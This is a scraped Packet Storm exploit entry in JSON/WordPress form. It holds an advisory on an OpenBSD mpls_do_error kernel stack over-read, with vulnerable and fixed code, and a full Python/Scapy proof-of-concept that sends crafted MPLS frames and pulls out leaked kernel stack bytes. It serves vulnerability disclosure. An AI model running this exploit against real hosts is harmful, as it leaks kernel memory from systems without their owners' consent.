{“lastseen”:”2026-06-22T18:40:00″,”description”:”OpenBSD suffers from an mplsdoerror remote kernel stack disclosure vulnerability via an MPLS label stack…”,”published”:”2026-06-22T00:00:00″,”modified”:”2026-06-22T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenBSD mpls_do_error Stack Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:223968″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-56099″],”sourceData”:”————————————————————————\\n OpenBSD mpls_do_error: Remote Kernel Stack Disclosure via MPLS Label \\n Stack Over-read\\n ————————————————————————\\n \\n Affected:\u00a0 OpenBSD -current prior to 2026-06-18 (fixed in -current)\\n Vendor:\u00a0 \u00a0 OpenBSD\\n Severity:\u00a0 Medium\\n Reporter:\u00a0 Argus Systems\\n Date:\u00a0 \u00a0 \u00a0 2026-06-12\\n CVE:\u00a0 \u00a0 \u00a0 \u00a0CVE-2026-56099\\n \\n \\n 1. SUMMARY\\n ==========\\n \\n The mpls_do_error() function in sys\/netmpls\/mpls_input.c parses an\\n incoming MPLS label stack into a fixed-size local array,\\n struct shim_hdr stack[MPLS_INKERNEL_LOOP_MAX] (16 entries). When the\\n parse loop completes without encountering the Bottom-of-Stack (BoS)\\n label, nstk reaches MPLS_INKERNEL_LOOP_MAX (16). Several subsequent\\n code paths then compute a copy length of (nstk + 1) * sizeof(*shim)\\n — 17 entries — and use it with icmp_do_exthdr(), M_PREPEND(), and\\n m_copyback() against the 16-entry stack object. This reads one\\n struct shim_hdr (4 bytes) past the end of the array, and that data is\\n reflected back to the sender inside the generated ICMP\/MPLS error\\n response.\\n \\n \\n 2. AFFECTED VERSIONS\\n ====================\\n \\n The (nstk + 1) length computations against the 16-entry stack[] array\\n were introduced with the ICMP\/MPLS error path on 2010-09-13 (commit\\n 201d6983add, \\”First shot at ICMP error handling inside an MPLS path.\\n Currently only TTL exceeded errors for IPv4 are handled.\\”). The parse\\n loop was bounded by MPLS_INKERNEL_LOOP_MAX (16), but nothing rejected\\n a stack that ran to completion without a BoS bit, so nstk could reach\\n 16 and the subsequent (nstk + 1) reads accessed stack[16].\\n \\n Affected: OpenBSD -current prior to 2026-06-18 (mpls_input.c pre\\n v1.82).\\n \\n \\n 3. DETAILS\\n ==========\\n \\n Vulnerable code (sys\/netmpls\/mpls_input.c, mpls_do_error):\\n \\n \u00a0 struct shim_hdr stack[MPLS_INKERNEL_LOOP_MAX];\u00a0 \u00a0\/* 16 entries *\/\\n \u00a0 …\\n \u00a0 for (nstk = 0; nstk \\u003c MPLS_INKERNEL_LOOP_MAX; nstk++) {\\n \u00a0 \u00a0 \u00a0 …\\n \u00a0 \u00a0 \u00a0 stack[nstk] = *mtod(m, struct shim_hdr *);\\n \u00a0 \u00a0 \u00a0 m_adj(m, sizeof(*shim));\\n \u00a0 \u00a0 \u00a0 if (MPLS_BOS_ISSET(stack[nstk].shim_label))\\n \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 break;\\n \u00a0 }\\n \u00a0 \/* no guard: with no BoS bit set, nstk == 16 here *\/\\n \\n \u00a0 shim = \\u0026stack[0];\\n \u00a0 …\\n \u00a0 case IPVERSION:\\n \u00a0 \u00a0 \u00a0 …\\n \u00a0 \u00a0 \u00a0 if (icmp_do_exthdr(m, ICMP_EXT_MPLS, 1, stack,\\n \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 (nstk + 1) * sizeof(*shim)))\\n \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 return (NULL);\\n \u00a0 \u00a0 \u00a0 …\\n \\n MPLS_INKERNEL_LOOP_MAX is defined as 16 and sizeof(struct shim_hdr) is\\n 4. With nstk == 16, each of these copies 17 * 4 = 68 bytes from a\\n 64-byte stack[] object, reading stack[16] — one struct shim_hdr (4\\n bytes) of adjacent kernel stack — and including it in the response.\\n \\n The same (nstk + 1) length is later used to prepend and m_copyback()\\n the stack back onto the reflected packet:\\n \\n \u00a0 M_PREPEND(m, (nstk + 1) * sizeof(*shim), M_NOWAIT);\\n \u00a0 …\\n \u00a0 m_copyback(m, 0, (nstk + 1) * sizeof(*shim), stack, M_NOWAIT);\\n \\n so the leaked entry also travels on the wire as the 17th MPLS shim\\n header of the returned frame.\\n \\n \\n 4. REACHABILITY\\n ===============\\n \\n The path is reachable remotely via mpls_input() -\\u003e mpls_do_error() on\\n systems that have MPLS enabled on an interface. The trigger is a\\n crafted MPLS frame (EtherType 0x8847) carrying 16 labels with no BoS\\n bit set and an outermost label TTL of 1, so the TTL-exceeded error\\n path is taken:\\n \\n \u00a0 mpls_input\u00a0 (ttl \\u003c= 1)\\n \u00a0 \u00a0 -\\u003e mpls_do_error(m, ICMP_TIMXCEED, ICMP_TIMXCEED_INTRANS, 0)\\n \\n The inner payload must be IPv4 so the IPVERSION branch is reached.\\n \\n \\n 5. IMPACT\\n =========\\n \\n Each crafted packet leaks 4 bytes of kernel stack memory adjacent to\\n the stack[] array. The leak is carried in the ICMP\/MPLS extension\\n object of the error response reflected back to the sender, so an\\n attacker can harvest the leaked bytes.\\n \\n \\n 6. PROOF OF CONCEPT\\n ===================\\n \\n A Python\/Scapy PoC sends a 16-label MPLS frame with no BoS bit set\\n and an outermost label TTL of 1, then captures the reply. On a\\n vulnerable kernel the reply carries 17 MPLS shim headers on the wire;\\n the 17th (stack[16]) is the leaked kernel stack data.\\n \\n PoC:\\n https:\/\/pop.argus-systems.ai\/attachments\/poc-008-mpls-stack-leak.py\\n \\n \\n 7. FIX\\n ======\\n \\n Fixed in -current by mvs on 2026-06-18. The fix adds a guard that\\n drops a label stack which runs to completion without a BoS bit, so\\n nstk can no longer reach MPLS_INKERNEL_LOOP_MAX:\\n \\n \u00a0 if (nstk \\u003e= MPLS_INKERNEL_LOOP_MAX) {\\n \u00a0 \u00a0 \u00a0 m_freem(m);\\n \u00a0 \u00a0 \u00a0 return (NULL);\\n \u00a0 }\\n \\n Fix commit (mpls_input.c v1.82):\\n https:\/\/github.com\/openbsd\/src\/commit\/6a23123ec05f1eb29cfcaae0f3a468b2e1983cfd\\n \\n \\n 8. TIMELINE\\n ===========\\n \\n \u00a0 2026-06-12\u00a0 Reported to security@openbsd.org with PoC\\n \u00a0 2026-06-18\u00a0 Fix committed to -current\\n \\n \\n 9. CREDIT\\n =========\\n \\n Discovered and reported by Argus Systems (https:\/\/byteray.co.uk\/).\\n \\n \\n 10. REFERENCES\\n ==============\\n \\n Advisory:\\n \u00a0 https:\/\/pop.argus-systems.ai\/advisory\/adv-040.html\\n \\n Proof of concept:\\n https:\/\/pop.argus-systems.ai\/attachments\/poc-008-mpls-stack-leak.py\\n \\n Fix commit:\\n https:\/\/github.com\/openbsd\/src\/commit\/6a23123ec05f1eb29cfcaae0f3a468b2e1983cfd\\n \\n \\n — packet storm poc attached —\\n \\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n PoC for report-008: MPLS label stack OOB read in mpls_do_error.\\n \\n When 16 MPLS labels arrive with no BoS bit set and TTL expires,\\n nstk reaches 16 and (nstk+1)*sizeof(shim_hdr) = 17 entries are\\n passed to icmp_do_exthdr \/ m_copyback. The 17th entry (stack[16])\\n is adjacent kernel stack memory, reflected back in the ICMP error’s\\n MPLS extension object.\\n \\n Setup required:\\n Host: tap0 at 192.168.100.1\\n OpenBSD: vio0 at 192.168.100.2, mpls enabled\\n \\n OpenBSD setup commands (as root):\\n # ifconfig vio0 192.168.100.2\/24 mpls up\\n # sysctl net.mpls.ttl=255\\n \\n Usage:\\n sudo python3 poc-008-mpls-stack-leak.py [–iface tap0] [–dst 192.168.100.2]\\n \\”\\”\\”\\n \\n import argparse\\n import sys\\n from scapy.all import Ether, IP, ICMP, sendp, sniff, get_if_hwaddr, get_if_list, srp, ARP\\n from scapy.contrib.mpls import MPLS\\n \\n MPLS_INKERNEL_LOOP_MAX = 16\\n \\n \\n def resolve_mac(dst_ip, iface, src_ip):\\n ans, _ = srp(\\n Ether(dst=\\”ff:ff:ff:ff:ff:ff\\”) \/ ARP(pdst=dst_ip, psrc=src_ip),\\n iface=iface, timeout=2, verbose=False\\n )\\n if not ans:\\n return None\\n return ans[0][1][ARP].hwsrc\\n \\n \\n def build_trigger(dst_mac, src_mac, dst_ip, src_ip):\\n \\”\\”\\”\\n 16 MPLS labels, no BoS on any, outermost TTL=1 so it expires on ingress.\\n Inner IPv4 payload so mpls_do_error takes the IPVERSION branch.\\n \\”\\”\\”\\n inner = IP(src=src_ip, dst=dst_ip, ttl=64, proto=1) \/ ICMP()\\n \\n stack = None\\n for i in range(MPLS_INKERNEL_LOOP_MAX – 1, -1, -1):\\n ttl = 1 if i == 0 else 64\\n lbl = MPLS(label=100 + i, s=0, ttl=ttl)\\n stack = lbl \/ stack if stack else lbl\\n \\n return Ether(src=src_mac, dst=dst_mac, type=0x8847) \/ stack \/ inner\\n \\n \\n def parse_extension(icmp_raw):\\n # ICMP extensions follow 128 bytes of original datagram\\n offset = 128\\n if len(icmp_raw) \\u003c= offset:\\n return None\\n return icmp_raw[offset:]\\n \\n \\n def main():\\n parser = argparse.ArgumentParser()\\n parser.add_argument(\\”–iface\\”, default=\\”tap0\\”)\\n parser.add_argument(\\”–dst\\”, default=\\”192.168.100.2\\”)\\n parser.add_argument(\\”–src\\”, default=\\”192.168.100.1\\”)\\n args = parser.parse_args()\\n \\n if args.iface not in get_if_list():\\n print(f\\”ERROR: interface {args.iface} not found\\”, file=sys.stderr)\\n sys.exit(1)\\n \\n src_mac = get_if_hwaddr(args.iface)\\n \\n print(f\\”Resolving MAC for {args.dst}…\\”)\\n dst_mac = resolve_mac(args.dst, args.iface, args.src)\\n if not dst_mac:\\n print(\\”ARP failed — is the VM up and vio0 configured?\\”)\\n sys.exit(1)\\n print(f\\” {args.dst} is at {dst_mac}\\”)\\n \\n pkt = build_trigger(dst_mac, src_mac, args.dst, args.src)\\n \\n # The kernel’s mpls_do_error builds an ICMP error, prepends (nstk+1)=17\\n # shim headers (one past the 16-entry stack[]), then mpls_input SWAPs\\n # label 100-\\u003e200 and sends it back as EtherType 0x8847. We capture that.\\n from scapy.all import AsyncSniffer\\n is_mpls_from_vm = lambda p: (\\n p.haslayer(‘Ether’) and\\n p[‘Ether’].type == 0x8847 and\\n p[‘Ether’].src == dst_mac\\n )\\n sniffer = AsyncSniffer(iface=args.iface, count=1, timeout=5,\\n lfilter=is_mpls_from_vm)\\n sniffer.start()\\n \\n print(f\\”Sending {MPLS_INKERNEL_LOOP_MAX}-label no-BoS packet (outermost TTL=1)…\\”)\\n sendp(pkt, iface=args.iface, verbose=False)\\n \\n sniffer.join(timeout=5)\\n replies = sniffer.results or []\\n \\n if not replies:\\n print(\\”\\\\nNo MPLS reply received.\\”)\\n print(\\”Fix: in the VM as root, swap the route:\\”)\\n print(\\” route delete -mpls -in 100 -pop -inet 192.168.100.1\\”)\\n print(\\” route add -mpls -in 100 -swap -out 200 -inet 192.168.100.1\\”)\\n return\\n \\n reply = replies[0]\\n raw = bytes(reply)[14:] # strip 14-byte Ethernet header\\n print(f\\”\\\\nMPLS reply received ({len(raw)} bytes) [TRIGGER CONFIRMED]\\”)\\n \\n # Wire packet structure (after Ethernet):\\n # [0] label 200 \u2014 SWAP outgoing label (replaced stack[0]=100)\\n # [1..15] labels 101\u2013115 \u2014 stack[1..15], all s=0\\n # [16] stack[16] \u2014 OOB read: 4 bytes past the 64-byte stack[] array\\n # [17+] inner IP\/ICMP \u2014 bytes misread as shims by this loop\\n #\\n # Expected labels 101-115 have raw 0x00065040 .. 0x00073040 pattern.\\n # stack[16] will NOT match that pattern.\\n EXPECTED_SHIMS = MPLS_INKERNEL_LOOP_MAX + 1 # 1 SWAP + 15 inner + 1 leaked\\n \\n print(f\\”\\\\nMPLS shim headers (first {EXPECTED_SHIMS + 2} parsed):\\”)\\n offset = 0\\n shim_count = 0\\n ip_start = None\\n while offset + 4 \\u003c= len(raw) and shim_count \\u003c EXPECTED_SHIMS + 2:\\n chunk = raw[offset:offset+4]\\n val = int.from_bytes(chunk, ‘big’)\\n label = (val \\u003e\\u003e 12) \\u0026 0xFFFFF\\n s = (val \\u003e\\u003e 8) \\u0026 0x1\\n ttl = val \\u0026 0xFF\\n if shim_count == 0:\\n tag = \\” (SWAP outgoing label)\\”\\n elif shim_count == MPLS_INKERNEL_LOOP_MAX:\\n # slot 16: 1 SWAP + 15 inner labels (101-115) = index 16 = stack[16]\\n tag = \\” \\u003c– stack[16] LEAKED KERNEL STACK BYTES\\”\\n leaked_bytes = chunk\\n elif shim_count \\u003e= MPLS_INKERNEL_LOOP_MAX:\\n tag = \\” (inner IP header)\\”\\n if ip_start is None:\\n ip_start = offset\\n else:\\n tag = \\”\\”\\n print(f\\” [{shim_count:2d}] label={label:\\u003c6} s={s} ttl={ttl:\\u003c3} raw={chunk.hex()}{tag}\\”)\\n offset += 4\\n shim_count += 1\\n if s == 1 and ip_start is None:\\n ip_start = offset\\n break\\n \\n # The actual IP packet starts at offset 17*4 = 68 bytes (17 MPLS shims on wire)\\n # regardless of how many the loop consumed.\\n ip_offset = EXPECTED_SHIMS * 4 # 17 * 4 = 68\\n if ip_start is None:\\n ip_start = ip_offset\\n \\n # Verify: shim count in reply\\n # A correct implementation would return NULL (no reply) or send \\u003c=16 shims.\\n # Seeing 17 shims (SWAP + 15 inner + 1 leaked) proves the OOB read.\\n oob_confirmed = shim_count \\u003e MPLS_INKERNEL_LOOP_MAX\\n if not oob_confirmed:\\n print(f\\”\\\\nNOT TRIGGERED\\”)\\n \\n \\n if __name__ == \\”__main__\\”:\\n main()”,”sourceHref”:”https:\/\/packetstorm.news\/download\/223968″,”cvss”:{“score”:6.9,”severity”:”MEDIUM”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:L\/SC:N\/VI:N\/SI:N\/VA:N\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/223968\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-22T18:40:00″,”description”:”OpenBSD suffers from an mplsdoerror remote kernel stack disclosure vulnerability via an MPLS label stack…”,”published”:”2026-06-22T00:00:00″,”modified”:”2026-06-22T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenBSD mpls_do_error Stack Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:223968″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-56099″],”sourceData”:”————————————————————————\\n OpenBSD mpls_do_error: Remote Kernel Stack Disclosure…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,48,12,21,13,53,7,11,5],"class_list":["post-64856","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-69","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n